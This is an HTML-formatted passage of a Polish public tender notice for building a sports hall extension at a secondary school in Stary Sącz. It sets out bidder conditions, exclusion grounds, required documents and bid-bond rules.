lub podwykonawcę,zamawiający zastrzega sobie prawo zwrócenia się do Państwowej Inspekcji Pracy o przeprowadzeniekontroli w zakresie realizacji przez wykonawcę obowiązku, o którym mowa w pkt II. III. Zamawiającynie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy Pzp. IV. Zamówienie jest przeznaczonedo użytku osób fizycznych, zatem zgodnie z art. 29 ust. 5 ustawy Pzp zamawiający uwzględnił w opisieprzedmiotu zamówienia (dokumentacji projektowej) wymagania w zakresie dostępności dla osóbniepełnosprawnych. V. Standardy jakościowe, o których mowa w art. 91 ust. 2a ustawy, odnoszące się dowszystkich istotnych cech przedmiotu zamówienia zostały określone w dokumentacji technicznejstanowiącej Załącznik nr 1 do SIWZ.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Określenie warunków: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, którychspełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Określenie warunków: Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca byłby zobowiązany wykazać w sposób szczególny.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">W tym zakresie Zamawiający wymaga, aby: i. Wykonawca w okresie ostatnich5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - wtym okresie) wykonał w sposób należyty oraz zgodnie z przepisami prawa budowlanego i prawidłowoukończył co najmniej jedną robotę budowlaną o podobnym charakterze do robót stanowiącychprzedmiot zamówienia - należy przez to rozumieć wykonanie roboty budowlanej polegającej nabudowie lub rozbudowie lub przebudowie budynku sali gimnastycznej lub hali sportowej lub sali/haliwidowiskowej lub widowiskowo - sportowej lub innego kubaturowego obiektu sportowego o wartościnie mniejszej niż 2 500 000,00 zł brutto (dwa miliony pięćset tysięcy złotych brutto). UWAGA: Wprzypadku, gdy wartość robót budowlanych będzie wyrażona w walucie innej niż PLN, zamawiającyprzeliczy wartość na PLN zgodnie z kursem ogłoszonym przez Narodowy Bank Polski, według kursuśredniego podanego w dniu, w którym zostało zamieszczone przez zamawiającego ogłoszenie ozamówieniu w Biuletynie Zamówień Publicznych. ii. Wykonawca dysponował: - kierownikiembudowy posiadającym wymagane przez prawo uprawnienia budowlane w specjalności konstrukcyjno- budowlanej bez ograniczeń, - kierownikiem robót branżowych posiadającym wymagane przezprawo uprawnienie budowlane w specjalności instalacyjnej w zakresie instalacji i urządzeń cieplnych,wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń, - kierownikiem robótbranżowych posiadającym wymagane przez prawo uprawnienie budowlane w specjalnościinstalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń, dokierowania powyższymi robotami zgodne z ich zakresem. (Zamawiający uzna warunek za spełnionytakże wówczas, jeżeli wskazane powyżej uprawnienia będą posiadały trzy osoby lub dwie osoby lubjedna osoba). Zamawiający dopuszcza kwalifikacje równoważne do w/w, zdobyte w innych państwachna zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U.z 2017 r. poz. 1332 ze zm.).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">I. Zgodnie z art. 26 ust. 2 ustawy Pzp zamawiający wezwie wykonawcę, którego oferta zostałanajwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia oświadczeń lub dokumentów potwierdzających brak podstaw wykluczenia wykonawcy.Zatem Zamawiający wezwie wykonawcę, do złożenia: a) odpisu z właściwego rejestru lub z centralnejewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu dorejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5pkt 1 ustawy Pzp; b) zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, żewykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przedupływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarłporozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzjiwłaściwego organu; c) zaświadczenia właściwej terenowej jednostki organizacyjnej ZakładuUbezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentupotwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lubinnego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem wsprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lubwstrzymanie w całości wykonania decyzji właściwego organu. II. Dokumenty podmiotówzagranicznych: Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytoriumRzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt I lit. a), b) i c) - składadokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejscezamieszkania, potwierdzające odpowiednio, że: a) nie otwarto jego likwidacji ani nie ogłoszonoupadłości (dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminuskładania ofert), b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne lubzdrowotne albo że zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz zewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie,odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzjiwłaściwego organu (dokument powinien być wystawiony nie wcześniej niż 3 miesiące przed upływemterminu składania ofert). Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsca zamieszkanialub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o którychmowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy,ze wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, którejdokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnymalbo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lubmiejsce zamieszkania wykonawcy lub miejsce zamieszkania tej osoby. Dokumenty te powinny byćwystawione nie wcześniej niż w terminie odpowiednio wskazanym powyżej w lit. a) i b). III. Wprzypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokumentypotwierdzające, iż wykonawcy nie podlegają wykluczeniu, określone powyżej w pkt I lit. a), b) i c)składa każdy z wykonawców oddzielnie. IV. W przypadku, gdy wykonawca w celu wykazaniaspełniania warunków udziału w postępowaniu powołuje się na zasoby innych podmiotów,Zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentówwymienionych w pkt I lit. a), b) i c). V. W przypadku, gdy Wykonawca zamierza powierzyćwykonanie części zamówienia podwykonawcy a nie jest on podmiotem, na którego zdolnościach lubsytuacji wykonawca polega na zasadach określonych w art. 22a ustawy Pzp, Zamawiający żąda odwykonawcy przedstawienia w odniesieniu do tego podmiotu dokumentów wymienionych w pkt I lit.a), b) i c).</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">I. Zgodnie z art. 26 ust. 2 ustawy Pzp zamawiający wezwie wykonawcę, którego oferta zostałanajwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzieńzłożenia oświadczeń lub dokumentów potwierdzających spełnianie przez wykonawcę warunkówudziału w postępowaniu. Zatem Zamawiający wezwie wykonawcę, do złożenia: a) wykazu robótbudowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminuskładania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniemich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostaływykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonanenależycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawabudowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądźinne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, ajeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tychdokumentów - inne dokumenty; b) wykazu osób, skierowanych przez wykonawcę do realizacjizamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakościlub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, atakże zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymiosobami. II. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,oświadczenia i dokumenty potwierdzające spełnianie warunków udziału w postępowaniu, określone wpkt I lit. a) i b) składa każdy z wykonawców, w zakresie, w którym wykazuje spełnianie warunkówudziału w postępowaniu.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Do oferty należy dołączyć dokument/-y wskazujący/-e, że osoba/-y podpisująca/-e ofertę i innedokumenty lub oświadczenia jest/są do tej czynności umocowana/-e, chyba że umocowanie wynika zdokumentów dostępnych w myśl art. 26 ust. 6 ustawy Pzp. Pełnomocnictwo powinno być złożone woryginale. W przypadku złożenia kopii pełnomocnictwa musi być ono potwierdzone za zgodność z oryginałem przez osoby udzielające pełnomocnictwa lub notariusza. Jeżeli prawo do podpisania ofertynie będzie wynikać bezpośrednio z pełnomocnictwa albo innych dostępnych dla Zamawiającegodokumentów zamawiający dokona w pierwszej kolejności sprawdzenia prawa do podpisania oferty(reprezentowania wykonawcy) w Centralnej Ewidencji i Informacji o Działalności Gospodarczej lubCentralnej Informacji Krajowego Rejestru Sądowego. W przypadku braku takiej informacji lubjakichkolwiek wątpliwości z nią związanych zamawiający wezwie Wykonawcę do złożeniastosownych pełnomocnictw. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmujepełnomocnictwo do składania w imieniu wykonawcy oświadczeń woli i wiedzy oraz poświadczania zazgodność z oryginałem ewentualnych kopii dokumentów składanych w postępowaniu. 2. Wykonawcymogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiająpełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowaniaw postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Oferta złożona przez spółkęcywilną traktowana jest jako oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia.Dokument potwierdzający ustanowienie pełnomocnictwa powinien zawierać wskazanie postępowaniao zamówienie publiczne, którego dotyczy, wykonawców ubiegających się wspólnie o udzieleniezamówienia, ustanowionego pełnomocnika oraz zakres jego umocowania. Podpisy muszą zostaćzłożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrzelub wpisie do ewidencji działalności gospodarczej. Dokument pełnomocnictwa należy przedstawić wformie oryginału lub kopii potwierdzonej notarialnie lub kopii potwierdzonej za zgodność zoryginałem przez osoby udzielające pełnomocnictwa. Wszelka korespondencja kierowana będziewyłącznie do podmiotu występującego jako pełnomocnik. Spełnianie warunków udziału wpostępowaniu ocenia się łącznie w stosunku do wszystkich wykonawców wspólnie ubiegających się oudzielenie zamówienia, z zastrzeżeniem, że żaden z wykonawców wspólnie ubiegających się oudzielenie zamówienia nie może podlegać wykluczeniu z postępowania. W przypadku udzieleniazamówienia konsorcjum (tzn. wykonawcy określonemu w art. 23 ust. 1 ustawy Pzp) zamawiającyprzed podpisaniem umowy zażąda przedłożenia umowy regulującej współpracę tych wykonawców. 3.Zgodnie z art. 24 ust. 11 ustawy Pzp, w terminie 3 dni od dnia zamieszczenia przez zamawiającego nastronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, wykonawca przekazujezamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupykapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów(tekst jedn. Dz. U. z 2018 r. poz. 798). Formularz oświadczenia zostanie zamieszczony nastronie internetowej zamawiającego wraz z informacją o wykonawcach, którzy złożyli oferty. Wraz zezłożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcąnie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o przynależności lubbraku przynależności do tej samej grupy kapitałowej, składa każdy z tych wykonawców. 4.Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownychsytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościachtechnicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej innych podmiotów,niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Wykonawca, którypolega na zdolnościach lub sytuacji innych podmiotów, musi udowodnić zamawiającemu, że realizujączamówienie będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególnościprzedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów napotrzeby realizacji zamówienia. 5. Wykonawca, który powołuje się na rozwiązania równoważneopisywanym przez zamawiającego, jest obowiązany wykazać, że oferowane przez niego robotybudowlane spełniają wymagania określone przez zamawiającego.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Zamawiający żąda od wykonawców wniesienia wadium. 1) Zamawiający określa kwotę wadium wwysokości 100 000,00 zł (słownie: sto tysięcy złotych 00/100). 2) Wadium wnosi się przed upływemterminu składania ofert. 3) Wadium może zostać wniesione w jednej lub kilku następujących formach:a) pieniądzu - przelewem na rachunek bankowy wskazany poniżej, b) poręczeniach bankowych lubporęczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawszeporęczeniem pieniężnym, c) gwarancjach bankowych, d) gwarancjach ubezpieczeniowych, e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości /tekst jedn. Dz. U. z 2018r. poz. 110 ze zm./. 4) Wadium wnoszone w pieniądzu: a) należy wpłacić przelewem na rachunek bankowyzamawiającego: Getin Noble Bank S.A. 10 1560 0013 2973 9238 1000 0009 z zaznaczeniem, żedotyczy: ZPI.272.7.2018 Przetarg nieograniczony na roboty budowlane polegające na rozbudowieistniejącego budynku Liceum Ogólnokształcącego w Starym Sączu o halę sportową; b) za datęwniesienia wadium uznaje się datę uznania rachunku zamawiającego; c) zamawiający dokonasprawdzenia czasu wpływu wadium na swój rachunek bankowy. 5) Wadium wnoszone w pozostałychformach dopuszczonych specyfikacją: a) oryginał dokumentu poręczenia lub gwarancji, o których mowa w pkt 13 ppkt 3) lit. b) - e) SIWZ należy załączyć do oferty przetargowej - zamawiający zaleca,aby dokument poręczenia lub gwarancji nie był trwale połączony z ofertą z uwagi na konieczność jegozwrotu; b) wadium składane w tych formach musi mieć datę początkową ważności równą co najmniejostatecznemu terminowi składania ofert, a datę końcową ważności upływającą najwcześniej wostatnim dniu związania ofertą. Gdy Wykonawca wnosi wadium w formie gwarancji bankowej lubgwarancji ubezpieczeniowej z treści tych gwarancji musi w szczególności jednoznacznie wynikaćzobowiązanie gwaranta do zapłaty całej kwoty w przypadku zaistnienia okoliczności, o których mowaw art. 46 ust 4a i 5 ustawy Pzp; c) w razie zawieszenia biegu terminu związania ofertą lubprzedłużenia terminu składania ofert, końcowy termin ważności wadium, o którym mowa w pkt 13ppkt 3) lit. b), c), d), e) SIWZ albo zostanie przedłużony przez wykonawcę, albo wniesie on nowewadium na przedłużony okres. 6) Zamawiający odrzuci ofertę jeżeli wadium nie zostało wniesione lubzostało wniesione w sposób nieprawidłowy. 7) Zamawiający zwróci wadium wszystkim wykonawcomniezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiemwykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 13 ppkt 11 lit.a) SIWZ. 8) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwróciwadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniuzabezpieczenia należytego wykonania umowy. 9) Zamawiający zwróci niezwłocznie wadium nawniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 10) Zamawiającyzażąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawiepkt 13 ppkt 7) SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jakonajkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez zamawiającego. 11)Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli: a) wykonawca w odpowiedzi na wezwanie,o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożyłoświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawyPzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgodyna poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brakmożliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej, b) wykonawca,którego oferta została wybrana, odmówił podpisania umowy w sprawie zamówienia publicznego nawarunkach określonych w ofercie, c) wykonawca, którego oferta została wybrana, nie wniósłwymaganego zabezpieczenia należytego wykonania umowy, d) zawarcie umowy w sprawiezamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy, któregooferta została wybrana.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span 